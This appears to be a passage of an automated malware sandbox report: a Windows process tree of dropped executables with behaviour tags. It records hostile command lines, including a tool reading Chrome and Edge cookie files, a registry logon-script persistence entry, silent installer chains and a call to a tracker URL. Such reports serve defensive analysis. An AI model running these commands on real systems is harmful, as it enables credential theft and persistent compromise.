PID:4580
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:2784
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6452
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7912
-
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
PID:4732 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:1304
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:4708
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:3476
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5944
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2132
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3092
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1304
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6480
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7824
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5880
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1276
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3160
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4288
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5632
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6524
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5140
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4180
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6284
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7708
-
-
-
-
C:\Users\Admin\Documents\ii6bmnn9p_oIqp2fsxJz8bSj.exe"C:\Users\Admin\Documents\ii6bmnn9p_oIqp2fsxJz8bSj.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4988 -
C:\Users\Admin\Documents\ii6bmnn9p_oIqp2fsxJz8bSj.exeC:\Users\Admin\Documents\ii6bmnn9p_oIqp2fsxJz8bSj.exe3⤵
- Executes dropped EXE
PID:4372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1412
-
-
-
-
C:\Users\Admin\Documents\lYgPFGrH4dK8txjhRvB6UDnS.exe"C:\Users\Admin\Documents\lYgPFGrH4dK8txjhRvB6UDnS.exe"2⤵
- Executes dropped EXE
PID:3980 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 2723⤵
- Program crash
PID:3496
-
-
-
C:\Users\Admin\Documents\xlwGhHKzOqtDuIGACjLOdzuw.exe"C:\Users\Admin\Documents\xlwGhHKzOqtDuIGACjLOdzuw.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3632 -
C:\Users\Admin\Documents\xlwGhHKzOqtDuIGACjLOdzuw.exeC:\Users\Admin\Documents\xlwGhHKzOqtDuIGACjLOdzuw.exe3⤵PID:784
-
-
C:\Users\Admin\Documents\xlwGhHKzOqtDuIGACjLOdzuw.exeC:\Users\Admin\Documents\xlwGhHKzOqtDuIGACjLOdzuw.exe3⤵PID:772
-
-
-
C:\Users\Admin\Documents\D9t_w3e0AQMrrfnq7ZreWa6s.exe"C:\Users\Admin\Documents\D9t_w3e0AQMrrfnq7ZreWa6s.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3604 -
C:\Users\Admin\AppData\Roaming\2427878.exe"C:\Users\Admin\AppData\Roaming\2427878.exe"3⤵PID:6828
-
-
C:\Users\Admin\AppData\Roaming\5027713.exe"C:\Users\Admin\AppData\Roaming\5027713.exe"3⤵PID:6960
-
-
C:\Users\Admin\AppData\Roaming\6642022.exe"C:\Users\Admin\AppData\Roaming\6642022.exe"3⤵PID:6920
-
-
-
C:\Users\Admin\Documents\RwRO9FbDB2r7KpXTPV_gVLzk.exe"C:\Users\Admin\Documents\RwRO9FbDB2r7KpXTPV_gVLzk.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Users\Admin\Documents\Z2fzHFHabHFBTcXc0he2LfvC.exe"C:\Users\Admin\Documents\Z2fzHFHabHFBTcXc0he2LfvC.exe"2⤵
- Executes dropped EXE
PID:2372
-
-
C:\Users\Admin\Documents\yXQtBZxC3yLClZBXHRXyhCMO.exe"C:\Users\Admin\Documents\yXQtBZxC3yLClZBXHRXyhCMO.exe"2⤵
- Executes dropped EXE
PID:856
-
-
C:\Users\Admin\Documents\tMSPWWCNJdpIjZyxpqPsEuy1.exe"C:\Users\Admin\Documents\tMSPWWCNJdpIjZyxpqPsEuy1.exe"2⤵
- Executes dropped EXE
PID:3240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 3163⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
-
C:\Users\Admin\Documents\w5Kud0JezoOd4Ag2HSy_hDMJ.exe"C:\Users\Admin\Documents\w5Kud0JezoOd4Ag2HSy_hDMJ.exe"2⤵
- Executes dropped EXE
PID:3852 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 2923⤵
- Program crash
PID:2696
-
-
-
C:\Users\Admin\Documents\0UJwrKoMGuTbU9Nq5Dx6Hhz8.exe"C:\Users\Admin\Documents\0UJwrKoMGuTbU9Nq5Dx6Hhz8.exe"2⤵
- Executes dropped EXE
PID:4900 -
C:\Users\Admin\Documents\0UJwrKoMGuTbU9Nq5Dx6Hhz8.exe"C:\Users\Admin\Documents\0UJwrKoMGuTbU9Nq5Dx6Hhz8.exe" -q3⤵
- Executes dropped EXE
PID:4876 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 10044⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3776
-
-
-
-
C:\Users\Admin\Documents\Ophc0Uzlgkux14AnOgTuCGrs.exe"C:\Users\Admin\Documents\Ophc0Uzlgkux14AnOgTuCGrs.exe"2⤵
- Executes dropped EXE
PID:1556 -
C:\Users\Admin\AppData\Local\Temp\is-37TDD.tmp\Ophc0Uzlgkux14AnOgTuCGrs.tmp"C:\Users\Admin\AppData\Local\Temp\is-37TDD.tmp\Ophc0Uzlgkux14AnOgTuCGrs.tmp" /SL5="$102BA,138429,56832,C:\Users\Admin\Documents\Ophc0Uzlgkux14AnOgTuCGrs.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4392 -
C:\Users\Admin\AppData\Local\Temp\is-GGT1G.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GGT1G.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3032 -
C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"5⤵
- Executes dropped EXE
PID:1540 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 2966⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3340
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
- Executes dropped EXE
PID:1584 -
C:\Users\Admin\AppData\Local\Temp\is-FR3T4.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-FR3T4.tmp\Inlog.tmp" /SL5="$701EE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵PID:2028
-
C:\Users\Admin\AppData\Local\Temp\is-73IB6.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-73IB6.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵PID:6900
-
C:\Users\Admin\AppData\Local\Temp\is-IEOOV.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-IEOOV.tmp\Setup.tmp" /SL5="$20546,17367866,721408,C:\Users\Admin\AppData\Local\Temp\is-73IB6.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵PID:868
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-TFIEP.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵PID:6940
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-TFIEP.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵
- Drops file in Windows directory
PID:5524
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵PID:6356
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵PID:2488
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-TFIEP.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-TFIEP.tmp\{app}\vdi_compiler"9⤵PID:5324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5324 -s 29610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7060
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵PID:6756
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=72110⤵
- Adds Run key to start application
- Enumerates system info in registry
PID:6660 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x7c,0x80,0x84,0x78,0xec,0x7ff9f57846f8,0x7ff9f5784708,0x7ff9f578471811⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:211⤵PID:3772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:311⤵
- Executes dropped EXE
PID:1248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:811⤵PID:6640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:111⤵PID:2360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:111⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4492 /prefetch:111⤵PID:5936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:111⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:111⤵PID:2104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3608 /prefetch:811⤵PID:7772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3608 /prefetch:811⤵PID:8004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:111⤵PID:8092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:111⤵PID:8156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5728 /prefetch:811⤵PID:2360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3004 /prefetch:111⤵PID:7804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:111⤵PID:3396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6308 /prefetch:211⤵PID:4384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:111⤵PID:5868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:111⤵PID:7752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1336 /prefetch:111⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:111⤵PID:5836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:111⤵PID:7356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1792 /prefetch:111⤵PID:7016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2876 /prefetch:111⤵PID:7516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:111⤵PID:3036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:111⤵PID:7644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14531690206731206439,8435980498891401634,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:111⤵PID:6324
-
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5652
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:2336 -
